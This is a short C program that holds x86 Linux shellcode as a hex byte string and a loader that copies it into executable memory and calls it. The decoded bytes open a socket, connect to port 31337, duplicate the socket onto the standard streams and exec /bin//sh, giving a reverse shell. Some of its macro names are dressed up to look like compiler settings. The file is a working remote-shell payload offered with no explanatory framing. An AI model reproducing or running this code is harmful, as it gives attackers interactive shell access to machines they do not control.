#include <string.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <unistd.h>
#define __PAYLOAD_WANT_DEBUG 0x1337
#define __GNU_C_PARAM_CHECK 0xdeadbeef
#ifdef __PAYLOAD_WANT_DEBUG
#include <stdio.h>
#endif
unsigned char *shellcode = "\x31\xc0\x31\xdb\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xb0\x66\xb3\x01\xcd\x80\x89\xc2"
"\x31\xc0\x31\xdb\x50\x66\x68\x7a\x69\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1"
"\xb0\x66\xb3\x03\xcd\x80\x52\x31\xc0\x31\xdb\x31\xc9\x5b\xb0\x3f\xcd\x80\x52\x31"
"\xc0\x31\xdb\x41\x5b\xb0\x3f\xcd\x80\x52\x31\xc0\x31\xdb\x41\x5b\xb0\x3f\xcd\x80"
"\x31\xc0\x31\xdb\x50\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x8b\x54\x24\x0c"
"\x8b\x4c\x24\x08\x8d\x1c\x24\xb0\x0b\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80";
int main(void) {
#ifdef __PAYLOAD_WANT_DEBUG
printf("Payload length: %i\n", strlen(shellcode));
#endif
#ifdef __GNU_C_PARAM_CHECK
void (*payload)(size_t a, size_t b, size_t c)__attribute__((regparm(3)));
#endif
payload = mmap(NULL, sysconf(_SC_PAGESIZE), PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, -1, 0);
memcpy(payload, shellcode, strlen(shellcode));
__asm__ __volatile__("call *%%eax"
:
: "r"(payload));
return (0);
}
